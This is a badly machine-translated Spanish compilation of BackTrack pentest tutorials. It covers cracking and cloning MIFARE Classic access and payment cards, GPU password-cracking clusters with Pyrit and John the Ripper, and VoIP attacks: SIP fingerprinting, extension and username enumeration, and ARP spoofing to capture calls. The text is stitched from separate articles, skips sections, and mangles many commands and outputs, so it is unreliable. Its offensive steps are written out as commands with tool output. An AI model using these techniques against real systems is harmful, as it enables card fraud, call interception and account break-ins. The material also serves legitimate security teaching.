[hide] 1 RFID Mifare Classic Cocinando con 2 0x00 Prefacio 2.1 De pen den cias 3 0x01 Hardware 3,1 tou cha tag AC R1 22 U 4 0x02 Software 4,1 AC R1 22 U con duc tor 4,2 de cd igo abi erto Nea r Fiel d Co mm
0x00 - Prlogo
Algunos de ustedes pueden haber ledo que el propio algoritmo simtrico de claves criptogrficas de la tarjeta MIFARE Classic se ha roto. La tarjeta MIFARE Classic se utiliza en los sistemas de control de acceso fsico (PACS) y los sistemas de pago sin contacto (incluyendo peaje y sistemas de transporte pblico). Segn algunas estimaciones, hay 500 millones de tarjetas MIFARE desplegados en todo el mundo, y la mayora de ellos son las tarjetas MIFARE Classic.
Mifare Classic es un bajo costo, de nivel de entrada chip, basado en la norma ISO / IEC 14443 Tipo A, 1kB o 4KB. Utiliza el estndar de 13,56 Mhz tarjeta inteligente sin contacto, CRYPTO1 propietario con 48 teclas bits. No hay proteccin contra la clonacin o modificaciones. Cualquier persona con 50 lector puede usar esta debilidad contra su infraestructura. Al menos un sector siempre se cifra con la clave por defecto. Despus de agrietamiento todas las claves, los hackers son capaces de cambiar el nombre, nmero de estudiantes universitarios, la fecha de caducidad ... Este libro de cocina es una prueba de concepto de lo fcil que se puede hacer. Ingredientes elegidos: Backtrack | touchatag paquete inicial Probado en: BackTrack 4 R2, BackTrack 5 Final, (32 bits)
Dependencias
root @ bt: ~ # apt-get install flex libpcsclite-dev libusb-dev checkinstall
0x01 - Hardware
Touchatag - ACR122U
Touchatag es ACS ACR122 (U) NFC lector RFID USB Reader. El lector USB funciona a 13,56 MHz (alta frecuencia RFID) y tiene una distancia de lectura de aproximadamente 4 cm (1 pulgada) cuando se utiliza con las etiquetas RFID touchatag. Este producto est fabricado por Advanced Card Systems Limited y parece estar disponible en diferentes configuraciones de hardware, pero no difiere mucho. Todos ellos estn usando un chip NFC PN532 Controller y una unidad ST7 microcontrolador.
0x02 - Software
ACR122U conductor
root @ bt: ~ # wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # unzip-d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # cd acr122u root @ bt: ~ # tar-jxvf acsccid-1.0.2.tar.bz2 root @ bt: ~ # cd acsccid-1.0.2 root @ bt:. ~ # / configure root @ bt: ~ # make root @ bt: ~ # checkinstall-D-y - instalar
Si el lector es rechazada por el firmware (mensaje de registro: "Firmware (xy) es falso") acaba de desactivar la comprobacin de versin. Todo lo que necesitas hacer es cambiar ifdDriverOptions (lnea 55 en Info.plist) para omitir la comprobacin de versin de esta manera:
root @ bt: ~ # nano / usr / lib / pcsc / drivers / IFD-ccid.bundle / Contenidos / Info.plist ifdDriverOptions 0 0005
A continuacin, reinicie el demonio pcscd y su lector touchatag deben ser reconocidos y listo.
Tambin puede utilizar el parmetro-k clave, para agregar una clave a la lista de claves conocidas, que est siendo juzgado en contra de su tarjeta en la fase inicial. La opcin-k de alguna manera no me funcion, as que siempre compilar mis claves conocidas directamente en Buscar mfoc.c "Matriz de teclas por defecto Mifare Classic" No estoy seguro acerca de otros pases, pero en el pas donde vivo teclas son las mismas . Una vez que tenga las llaves de todos los sectores, debe ser capaz de utilizar RFID-Fu contra otras tarjetas, lo cual es epic fail.
root @ bt: ~ # nfc-mfclassic - ayuda Uso: nfc-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]
r | w - Realizar leer (r) o escribir (w) tarjeta A | B - Utilice las teclas A o B para la accin <dump.mfd> - Dump MiFare (MFD) que se utiliza para escribir (tarjeta de MFD) o (MFD a la tarjeta) <keys.mfd> - MiFare Dump (MFD) que contienen las teclas (opcional) O bien: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extracto de carga til (bloques de datos) de MFD <dump.mfd> - MiFare Dump (MFD) que contiene la carga til quera <payload.bin> - Binary carga de archivos donde se extraern
Tenga en cuenta que los UID de la tarjeta no se ver afectada (no cambia) con este proceso. Compre algunas tarjetas en blanco o III Proxmark si eso es lo que quieres. Si usted est pensando ahora vertido su monedero electrnico inmediatamente despus de la recarga y cuando el crdito llega a cero, escribir el contenido de nuevo, por favor, no lo hagas. Qu se puede dejar de hacer eso? Bueno, probablemente slo su conciencia, pero si la tarjeta se bloquea en 24 horas despus del primer uso y luego no te quejes. S, hay control en lnea y facturacin de los sistemas que hay para tarjetas bsicas.
0x06 - Conclusin
Por ltimo, cundo la gente a aprender la leccin? Los algoritmos criptogrficos deben ser pblicos para que puedan ser analizado y probado. Algoritmos secretos no son ms valiosos porque son secretos. Cualquier persona que necesite una tarjeta inteligente alta seguridad debe asegurarse de que hay seguridad en capas y no slo depende de la encriptacin del chip.
0x08 - Gracias
Este libro de cocina fue hecha con gran ayuda de los chicos h4f, muchas gracias a Vulcano y Atrs.
0x0A - Acerca de
MI1 es un "entusiasta plena seguridad tiempo" con ttulo universitario en el campo de la informtica. Recientemente centrando su pasin por cosas USRP y RFID.
Privilege Escalation
CUDA en BackTrack 5
CUDA en BackTrack 5
Esta gua es un trabajo en progreso, y est diseada para ayudar a aquellos que necesitan obtener CUDA trabajando en sus mquinas inversas. Comience por la preparacin de sus fuentes del ncleo para la instalacin del controlador Nvidia:
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /
Descargar drivers de Nvidia de acuerdo con la arquitectura de CPU: 32 64 Asegrese de que no est en una sesin X (cerrar la sesin a la consola), y ejecutar el instalador del
controlador Nvidia. A continuacin, descargue el kit de herramientas CUDA, de acuerdo con la arquitectura de CPU: 32 64 Lo ideal es instalar el kit de herramientas CUDA en / opt. esta gua se presupone esta ruta de instalacin. Configurar las variables de entorno para que el comando NVCC funciona. Usted puede hacer esto aadiendo las siguientes lneas en el archivo / root / .bashrc archivo:
PATH = $ PATH :/ opt / cuda / bin LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib export PATH export LD_LIBRARY_PATH
A continuacin, ejecute:
root @ bt: ~ # source / root / .bashrc root @ bt: ~ # ldconfig
El propsito de esto era conseguir compilador NVCC instalado. Usted puede comprobar que todo est configurado correctamente:
root @ bt: ~ # que NVCC / Opt / cuda / bin / NVCC root @ bt: ~ # NVCC-V NVCC: NVIDIA (R) Cuda conductor compilador Copyright (c) 2005-2011 NVIDIA Corporation Construido sobre Sun_Mar_20_16: 45:27 _PDT_2011 Cuda herramientas de compilacin, versin 4.0, V0.2.1221 root @ bt: ~ #
Ahora que el controlador de Nvidia CUDA y kit de herramientas se instalan, podemos probar su funcionalidad con una herramienta GPU potencia, como Pyrit.
root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ Pyrit root @ bt: ~ # cd Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd .. / .. / root @ bt: ~ # cd Pyrit / cpyrit_cuda && python setup.py construir && python setup.py install
Ejecutar un punto de referencia para ver que todo funciona como se espera:
root @ bt: ~ # Pyrit punto de referencia Pyrit 0.4.1-dev (svn R308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com Este cdigo se distribuye bajo la v3 Licencia Pblica General GNU + Punto de referencia en funcionamiento (63.787,8 PMKs / s) ... \ Computarizada 63.787,82 PMKs / s total. # 1: 'CUDA-Device # 1' GeForce GTX 295: 11558.7 PMKs / s (RTT 3,0) # 2: "CUDA-Device # 2 'GeForce GTX 295: 10912.5 PMKs / s (RTT 2.9) # 3: "CUDA-Device # 3 'GeForce GTX 295: 10632.1 PMKs / s (RTT 3,0) # 4: "CUDA-Device # 4 'GeForce GTX 295: 11654.7 PMKs / s (RTT 2.9) # 5: "CUDA-Device # 5" GeForce GTX 295: 10868.9 PMKs / s (RTT 2.9) # 6: "CUDA-Device # 6 'GeForce GTX 295: 10322.8 PMKs / s (RTT 3,0)
# 7: 'CPU Core (SSE2)': 500,7 PMKs / s (RTT 2.7) # 8: "CPU Core (SSE2) ': 508,9 PMKs / s (RTT 2.8)
xito! Ahora podemos utilizar las herramientas CUDA BackTrack impulsados desde dentro.
JTR grupo
Despus de instalar la versin MPI de John the Ripper configuramos nuestro archivo / etc / hosts.
root @ bt: ~ # nano / etc / hosts 127.0.0.1 localhost 192.168.1.69 servidor 192.168.1.70 nodo1 # Las siguientes lneas son recomendables en equipos que pueden IPv6 :: 1 localhost ip6-localhost loopback ip6fe00 :: 0 ip6-localnet ff00 :: 0 ip6-mcastprefix ff02 :: 1 ip6-allnodes
NOTA: Haga exactamente lo mismo en el cliente. Una vez que tenemos el servidor y la configuracin del cliente es el momento para que nuestro servidor SSH y transferir los archivos de configuracin desde el servidor al cliente.
root @ bt: ~ # ssh root@192.168.1.70 mkdir-p / root / .ssh root @ bt: ~ # cat / root / .ssh / id_rsa.pub | ssh root@192.168.1.70 'cat >> .ssh / authorized_keys' root @ bt: ~ # scp / root / mpd.hosts root@192.168.1.70 :/ root / root @ bt: ~ # scp / etc / mpd.conf root@192.168.1.70 :/ etc / root @ bt: ~ # scp / etc / hosts root@192.168.1.70 :/ etc /
Pyrit grupo
root @ bt: ~ # nano ~ / .pyrit / config root @ bt: ~ # cat ~ / .pyrit / config default_storage = file :/ / limit_ncpus = 0 rpc_announce = true rpc_announce_broadcast = false rpc_knownclients = 192.168.1.69 (Esta es la IP de los servidores) rpc_server = true workunit_size = 75000
Despus de tener el archivo de configuracin anterior en todas nuestras mquinas, se inicia el servidor.
root @ bt: ~ # Pyrit servir
Ahora, desde que el cliente debe ser capaz de ver ambos ncleos. NOTA: El comando Pyrit list_cores tiene un error que cuando se utiliza el servidor se bloquee.
Podemos probar nuestro cmulo de nueva construccin con opcin de punto de referencia Pyrit.
root @ bt: ~ # Pyrit punto de referencia
Si cambiar al servidor mientras se ejecuta el punto de referencia, se puede ver que en la actualidad uno cliente est conectado.
Voz sobre IP
Pentesting VOIP
Este artculo fue contribuido por NightRang3r. URL: http://www.back-track.de/index.php?page=team # SMTX Twitter: ! http://twitter.com/ # / NightRang3r Email: shai@exploit.co.il
Contenido
[hide] 1 Pruebas de Penetraci n con BackTrack VOIP 2 Tpico VoIP Topologas 2,1 Self Hos ted 2,2 Hos ted Ser vic es 2.3 Ser vici o Onl ine SIP 3 Fundament os SIP 3.1 Las soli citu des SIP / Mt odo s 3 3.2 Las res
Sistemas de telefona IP tambin son susceptibles a la escucha, hacerlo en un entorno IP es un poco ms difcil de ejecutar, detectar y requieren ms los conocimientos y el conjunto adecuado de herramientas. En este artculo no vamos a hablar de un proveedor en particular o de la tcnica, pero vamos a echar un vistazo a los conceptos y las herramientas disponibles para atacar a nuestra disposicin VoIP en Backtrack Linux. El objetivo principal de este artculo es presentar las herramientas y su uso con el fin de ayudarle a elegir la herramienta adecuada para la situacin correcta. Vamos a examinar algunos vectores de ataque del mundo real y descubrir cmo BackTrack puede ayudarnos pentesting VoIP, tambin vamos a examinar algunas de las herramientas que se presentan en BackTrack y su uso.
Auto Hosted
Una PBX (ie Asterisk) est instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios de telefona PSTN a travs de una troncal SIP / PRI, el trfico de VoIP fluye a travs de una VLAN dedicada. Visio diagrama de Amir Avraham
Servicios de Alojamiento
No hay necesidad de un PBX en el sitio. Slo un switch, un router, telfonos IP y una conexin a la central a travs de proveedor de servicios de Internet o IP / VPN conexin, cada telfono se configura con informacin de la cuenta SIP.
SIP Basics
El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada concentrndose la voz y / o el trfico de video soportado por un protocolo como RTP (Protocolo de transporte en tiempo real). SIP es un protocolo de capa de aplicacin que utiliza UDP para el transporte (TCP y SCTP se puede utilizar tambin). SIP normalmente utiliza los puertos 5060 TCP o UDP para sealizacin cifrada o 5061 para el transporte cifrado mediante TLS. SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP utilizando una peticin / respuesta modelo. Al igual que una peticin HTTP de un navegador de una solicitud de cliente SIP se realiza mediante un URI SIP un agente de usuario y un mtodo / solicitud. SIP utiliza el correo electrnico como formato de direcciones: user / telfono @ dominio / IP es un tpico URI SIP se ve as:
sip: 205@192.168.1.100, sip: username@pbx.com, sip: 205@192.168.1.100: 5060
De acuerdo con la solicitud presentada por el cliente ser recibido una respuesta con un cdigo de estado o de error, las tablas siguientes se describen las peticiones y las respuestas disponibles en el protocolo SIP.
CONSULTE
actualizaciones de estado de un mando a distancia nodo. El mtodo NOTIFY se utiliza para notificar a un nodo SIP que un evento NOTIFICAR que ha sido solicitada por un mtodo anterior tiene SUBSCRIBE ocurrido.
SIP Respuestas
Respuesta 1xx Descripcin Respuestas informativos, solicitud recibida y ser procesada. Respuestas exitosas La accin fue recibida con xito, 2xx 3xx 4xx 5xx comprendido y aceptado. Respuestas de redireccin Solicitar respuestas fracaso de la peticin es sintcticamente incorrecta o no se pueden cumplir en el servidor. Las respuestas del servidor falla, el servidor incumplido una de las
aparentemente solicitud vlida. Respuestas globales fracaso de la solicitud no puede cumplirse en cualquier 6xx servidor.
El telfono que llama enva una invitacin. El telfono llamado devuelve una respuesta de 100 (Tratar). El telfono llamado entonces comienza a sonar y enva una respuesta de 180 (Ringing). Cuando la persona toma el telfono el telfono llama enva una respuesta de 200 (OK). El telfono que llama enva una respuesta ACK. La conversacin se inicia a travs de RTP. Cuando la persona que llama cuelga el telfono una peticin BYE es enviada. El telfono que llama responde con 200 (OK).
De ataque
Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes VoIP: Recopilacin de informacin, Huella y recuento.
Seguimiento de llamadas de trfico y escuchas telefnicas. Atacar autenticacin. VLAN salto. Denegacin de servicio / Inundaciones. Suplantacin de identificacin de llamadas. Con el fin de probar las herramientas que ha configurado un sistema de Trixbox PBX y creado 6 extensiones. Me va a utilizar dos telfonos de software, es un cliente basado en Linux llamado Twinkle y el segundo es un cliente basado en Windows llamado X-Lite. Me va a utilizar la versin ltima y ms grande de Backtrack Linux que es R2. Usted puede encontrar la mayora de las herramientas de ataque de VoIP en Backtrack bajo el directorio "/ pentest / voip /" directorio:
root @ bt: ~ # cd / pentest / voip / root @ bt :/ pentest / voip #
O simplemente puede navegar a travs del men de KDE para el "Backtrack" "Voz sobre IP" submens:
Recopilacin de informacin
Esta fase es donde nos reunimos informacin acerca de la topologa, servidores y clientes para obtener informacin tanto como podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la bsqueda de hospederos vivos, el tipo y la versin PBX, servidores VoIP / gateways, clientes (hardware y software) los tipos y versiones, etc ... En vez de enumerar los nombres de usuario "" vamos a enumerar las extensiones SIP. Echemos un vistazo a algunas de las herramientas disponibles en Backtrack que nos ayuden a encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.
SMAP
Backtrack incluye una gran herramienta llamada SMAP, que es un escner simple para dispositivos con capacidad SIP SMAP enva de varias solicitudes SIP en espera de respuestas de SIP habilitado router DSL, apoderados y agentes de usuario. Se podra considerar un mash up de NMAP y SIPSAK. SMAP uso:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP SMAP 0.6.0 http://www.wormulon.net/ uso: SMAP [Opciones] -H: esta ayuda -D: aumentar la depuracin -O: activar huellas dactilares
-O: permitir una mayor toma de huellas dactilares detallado -L: el modo de aprendizaje de huellas dactilares -T: transporte TCP -U: transporte UDP (por defecto -P0: Tratar a todos los hosts en Internet - skip anfitrin descubrimiento -P : Puerto de destino -R : Mensajes al lmite de velocidad de segundo -D : Dominio SIP para usar sin provocar sip: -W : Tiempo de espera en milisegundos
Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella digital del tipo cliente / servidor y versin:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-O 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/
192.168.1.104: accesible ICMP, SIP habilitado mejor estimacin (70% seguro) huella digital: Asterisk PBX SVN-r56579 troncoUser-Agent: Asterisk PBX 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)
En el caso de SMAP no poda nuestra huella anfitrin se utiliza el argumento-l para ponerlo en modo de aprendizaje para proporcionar alguna informacin til:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-l 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/ AVISO: test_accept: "Accept: application / sdp" AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY" AVISO: test_supported: "Con el apoyo: sustituye" AVISO: test_via: capitalizacin de transporte: 2 AVISO: test_via: "sucursal; alias; recibido; rport" AVISO: test_via: Por favor, aadir cmpstr nuevo AVISO: test_via: capitalizacin de transporte: 2 192.168.1.104: accesible ICMP, SIP habilitado mejor estimacin (70% seguro) huella digital: Asterisk PBX SVN-r56579 troncoHUELLA informacin: newmethod = 501 accept_class = 2 allow_class = 201 supported_class = 8 via_class = 2 hoe_class = ignorar options = 200 brokenfromto = 404 PRACK = 481 mesa de ping = 501 invitar = 200 User-Agent: Asterisk PBX 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)
Otra caracterstica til de SMAP es el argumento-d, que permite la salida de depuracin para verbosidad intenta utilizar el o-junto con l a ver el proceso de toma de huellas dactilares en los detalles.
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-d 192.168.1.104 SMAP 0.6.0 http://www.wormulon.net/ DEBUG: DEBUG: DEBUG: DEBUG: DEBUG: IP local: 212.235.66.182 IP local: 212.235.66.182 bind () con xito RAW socket abierto pasar de 1 a S_START S_PING
DEBUG: Responder ICMP Echo error DEBUG: 192.168.1.104 / 1 peticin: solicitud SIP OPTIONS (vlido) DEBUG: respuesta pertenece a la tarea 1 (192.168.1.104) DEBUG: ACK: ACK sip: localhost SIP/2.0 Via: SIP/2.0/UDP 212.235.66.182:12345; sucursal = z9hG4bK.56689, alias, recibido = 192.168.1.105; rport = 5060 De: ; Tag = 6b9ae50e67345d3b A: ; Tag = as14262fec Call-ID: 1992951560@212.235.66.182 CSeq: ACK 23915 Content-Length: 0 User-Agent: SMAP 0.6.0 --- Fin del ACK 192.168.1.104: accesible ICMP, SIP habilitado DEBUG: destruir la tarea 1 1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)
SIPSAK
SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el mtodo de solicitud nica opcin. Podemos usarlo para huellas digitales y enumeracin. Usted no encontrar SIPSAK en el directorio "/ pentest / voip /" directorio, se puede ejecutar desde cualquier lugar simplemente escribiendo SIPSAK.
root @ bt: ~ # SIPSAK SIPSAK 0.9.6 por Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils, informe de errores a Ohlmeier nils@sipsak.org rodaje: SIPSAK [-f archivo] [- L]-s SIPURI rastro: SIPSAK-T-s SIPURI usrloc: SIPSAK-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z NMERO]-s SIPURI usrloc: SIPSAK -I | M [-b NMERO] [-e NMERO]-s SIPURI usrloc: SIPSAK-U [-C SIPURI] [-x NMERO]-s SIPURI mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI inundacin: SIPSAK-F [-e NMERO]-s SIPURI azar: SIPSAK-R [-t NMERO]-s parmetro SIPURI adicional en todos los modos: [-a CONTRASEA] [-d] [ -i] [-H HOSTNAME] [-l PUERTO] [-m nmero] [-n] [-N] [-r puerto] [-v] [-V] [-w]-h muestra este mensaje de ayuda - V imprime cadena de versin slo-f file El archivo que contiene el mensaje de SIP para enviar uso - por nivel de entrada-L desactivar CR (\ r) insercin en los archivos-s SIPURI la URI del servidor de destino en forma sip: [usuario @] nombre_servidor [: puerto]-T activa el modo de traceroute-U se activa el modo usrloc-I simula algunas llamadas exitosas con s mismo-M enva mensajes a s mismo-C SIPURI utilizar el URI como contacto en REGISTER-b Nmero del apndice nmero inicial de el nombre de usuario (por defecto: 0)-E Nmero de la numer de finalizacin del apndice del nombre de usuario-o nmero de nmero de dormir ms antes de enviar el siguiente peticin-x NMERO expira el campo de encabezado valor (por defecto: 15)-z NMERO activa el azar eliminacin de usuario encuadernaciones-F se activa el modo de inundacin-R activa los modues aleatorios (peligroso)-t Nmero El nmero mximo de caracteres destrozado en modo aleatorio (por defecto: duracin peticin)-l PORT del puerto local para usar (por defecto: ninguno) - r El puerto remoto (por defecto: 5060)-p objetivo peticin HOSTNAME (proxy saliente)-H HOSTNAME sobrescribe el nombre de host local en todo NMERO headers-m el valor de la cabecera max-forwards campo-n usar FQDN en lugar de direcciones IP en la Via-Line-i desactivar la insercin de un Via-Line-una contrasea para la autenticacin de contrasea (si la contrasea se omite = "")-u nombre de usuario de autenticacin STRING-d-v ignorar redireccionamientos cada v produce ms verbosidad (mx. 3) -w IP extracto de la advertencia en respuesta-g cadena de reemplazo para una marca especial en la sustitucin mensaje-G activa de las variables-N devuelve cdigos de salida compatible con Nagios-q Cadena de bsqueda de una
expresin regular en las respuestas y en caso de fallo de error de retorno-W NMERO volver advertencia Nagios si retransmisin> nmero B-STRING enviar un mensaje con la cadena como cuerpo-O CADENA Content-Disposition Nmero NMERO valor-P de los procesos de start-A Nmero Nmero de ejecuciones de pruebas e imprimir slo tiempos-S utilizan un mismo puerto para la recepcin de y el envo-c SIPURI utilizar el URI como en De MENSAJE-D multiplicador de tiempo de espera para INVITAR NMERO transacciones y medios de transporte confiables (por defecto: 64)-E STRING especificar de transporte a utilizar-j STRING agrega cabeceras adicionales a la solicitud
He aqu un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver en el resultado de que el dispositivo que consulta es un Audiocodes MP-114 gateway FXS.
root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221 mensaje recibido: SIP/2.0 200 OK Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias De: sip: sipsak@127.0.1.1: 51601; tag = 97ac9e5 A: sip: 192.168.1.221; tag = 1c1785761661 Call-ID: 159042021@127.0.1.1 CSeq: 1 OPCIONES Contacto: Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad Permitir: REGISTRO, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE, UPDATE servidor:-Audiocodes-SIP-Gateway-MP 114 FXS/v.5.40A.040.005 X-Recursos: telchs = 4/0; mediachs = 0/0 Accept: application / sdp, application / simple-mensaje-resumen, el mensaje / sipfrag Content-Type: application / sdp Content- Longitud: 343 v = 0 o = 1785763980 1785763858 AudiocodesGW EN IP4 192.168.1.221 s = Telfono-Call C = EN IP4 192.168.1.221 t = 0 0 = 6000 m audio RTP / AVP 18 8 0 127 a = rtpmap: 18 G729 / a = 8000 fmtp: 18 annexb = no a = rtpmap: 8 PCMA/8000 a = rtpmap: 0 PCMU/8000 a = rtpmap: 127 telephone-event/8000 a = fmtp: 127 = 0-15 un ptime: 20 a = sendrecv a = RTCP: 6001 EN IP4 192.168.1.221 ** respuesta recibida despus de 67,923 ms ** SIP/2.0 200 OK final recibida
SIPScan
Sip-Scan es un escner simple para saborear hosts habilitados para que pueda escanear un solo host o una subred completa. Sip-scan uso:
root @ bt :/ pentest / voip / sipscan # / sip exploracin--. ayudar . / Sip-scan versin [unknown] llamado Getopt :: std :: getopts (versin 1,05), funcionando bajo la versin Perl 5.10.0. Uso: sip-scan [opciones] -V Ser detallado. -I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0) -P puerto puerto remoto para escanear. (Por defecto: 5060) -L puerto local origen de los paquetes. (Por defecto: 5060) -Dn [p] Espere n ms despus de cada paquete enviado (por defecto: 50ms) o si 'p' es dado, enve n paquetes por segundo (por defecto: 20) -Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)
SVMAP
SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escner de eleccin Puede ser utilizado para escanear identificar y huella digital de una sola direccin IP o un rango de direcciones IP. Svmap permite especificar el mtodo de la peticin que est siendo usado para la digitalizacin, el mtodo predeterminado es OPCIONES, ofrece depuracin y opciones de verbosidad e incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el modificador /. Svmap h-para ver todos los argumentos disponibles
. root @ bt :/ pentest / voip / sipvicious # / svmap.py uso: svmap.py [opciones] host1 host2 hostrange ejemplos: svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10,0 ... .1.1/24 \> 1.1.1.1-20 1.1.2-20 * 4.1 * * svmap.py-s session1 - aleatorizar 10.0.0.1 / 8 svmap.py - resume session1-v svmap.py - p5060-5062-m 10.0.0.3-20 INVITAR
Extensiones Enumeracin
Enumeracin de extensin puede ayudar a un atacante mediante la bsqueda de extensiones vlidas en un sistema de VoIP que luego puede conducir a un ataque de fuerza bruta sobre las cuentas SIP. Enumeracin obras de ampliacin por los errores que examinan devueltos por los mtodos solicitudes SIP REGISTER como, opciones y INVITAR Svwar Svwar es tambin una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una gama de extensiones o utilizar un archivo de diccionario svwar apoya todos los de los tres mtodos de enumeracin de extensin como se ha mencionado anteriormente, el mtodo por defecto para la enumeracin es registrarse.
Uso:
root @ bt :/ pentest / voip / sipvicious #. / svwar.py Uso: svwar.py [opciones] destino ejemplos: svwar.py-e100-999 10.0.0.1 svwar.py-d dictionary.txt 10.0.0.2
Ejemplo:
root @ bt :/ pentest / voip / sipvicious #. / 192.168.1.104 svwar.py-e100-400 | Extensin | Autenticacin | -----------------------------| 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth |
Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro mtodo sorbo utilizando el m-argumento, tambin se puede aadir-v o t-vv para mostrar ms informacin.
. root @ bt :/ pentest / voip / sipvicious # / svwar.py-e100-400 192.168.1.104 m-INVITE-v INFO: TakeASip: tratar de obtener ip auto .. puede tardar un rato INFO: root: iniciar el INFO motores: TakeASip: Ok dispositivo SIP INFO encontrados: TakeASip: extension '200 'existe - requiere autenticacin INFO: TakeASip: extension '201' existe - requiere autenticacin ----- Edit- --- INFO: TakeASip: extension '203 'existe - requiere autenticacin INFO: TakeASip: extension '303' existe requiere autenticacin INFO: TakeASip: extension '303 'existe - requiere autenticacin INFO:
TakeASip: extension '305' existe - requiere INFO autenticacin: root: contamos con 6 extensiones | Extensin | Autenticacin | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | | 202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO: root: Tiempo total: 0:00:21.944731
Enumiax Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un ataque de diccionario o un nombre de usuario secuencial Adivinar
root @ bt :/ pentest / voip / enumiax #. / enumiax enumIAX 1,0 Dustin D. Trammell Uso: enumiax [opciones] destino opciones: -D Diccionario ataque con expediente -I Intervalo para auto-save (nmero de operaciones, por defecto 1000) -M # nombre de usuario mnima (en caracteres) -M # nombre de usuario mximo (en caracteres) -R # lmite de velocidad de las llamadas (en microsegundos) -S Leer el estado de sesin de archivo de estado -V verbosidad Incremento (repeticin de verbosidad adicional) -V Imprimir informacin de versin y salir -H help Imprimir / uso de la informacin y de salida root @ bt :/ pentest / voip / enumiax #. / enumiax-v-M3-M3 192.168.1.104 enumIAX 1,0 Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ... Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:04:18 Ahora trabaja en 3 nombres de usuario de caracteres ... ################# Tratando nombre de usuario: "000" ################# Tratando nombre de usuario: "001" ################# Tratando nombre de usuario: "002" ################# Tratando nombre de usuario: "003" ################# Tratando nombre de usuario: "004" ################# Tratando nombre de usuario: "005" ################# Tratando nombre de usuario: "006" ################# Tratando nombre de usuario: "007" ################# Tratando nombre de usuario: "008" ################# ... ################ ################ ################ ################ ################ ################ ################ ################ ################ ################
Dustin D. Trammell Objetivo adquirido: 192.168.1.104 Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ... Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:02:39 ##################### Tratando de usuario: "guest" ##################### Tratando nombre de usuario: "iaxtel" ##################### Tratando nombre de usuario: "iaxtel2" ##################### Tratando de usuario: "100" ##################### Tratando nombre de usuario: "101" ##################### Tratando nombre de usuario: "200" ##################### Tratando nombre de usuario: "201" ##################### Tratando de usuario: "202" ##################### Tratando nombre de usuario: "203" Fin del archivo de diccionario alcanzado, salir. ############ ############ ############ ############ ############ ############ ############ ############ ############
Para este tipo de ataque que tendr que realizar un hombre en medio del ataque que se requieren los siguientes pasos: Arp intoxicacin / spoofing Oler el trfico Decodificacin RTP datos a un archivo de audio.
arpspoof" carpeta en Backtrack, de hecho slo puede invocarlo desde cualquier lugar, escribiendo: arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvo IP:
root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward
Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura con Wireshark.
Ahora vamos a empezar a capturar algo de trfico ... Si bien para olfatear el trfico de usuario "B" ha puesto en marcha el telfono X-Lite suave en su computadora de escritorio y marc el usuario "A" extensin 200.
Wireshark ha capturado algo de trfico, despus de un tiempo me he detenido el proceso de captura y se guarda las sesiones en un archivo llamado "sip.pcap".
Podemos ver que hemos capturado el trfico SIP, pero para esta seccin estn ms interesados en el trfico RTP, ya que contiene los datos reales de conversacin.
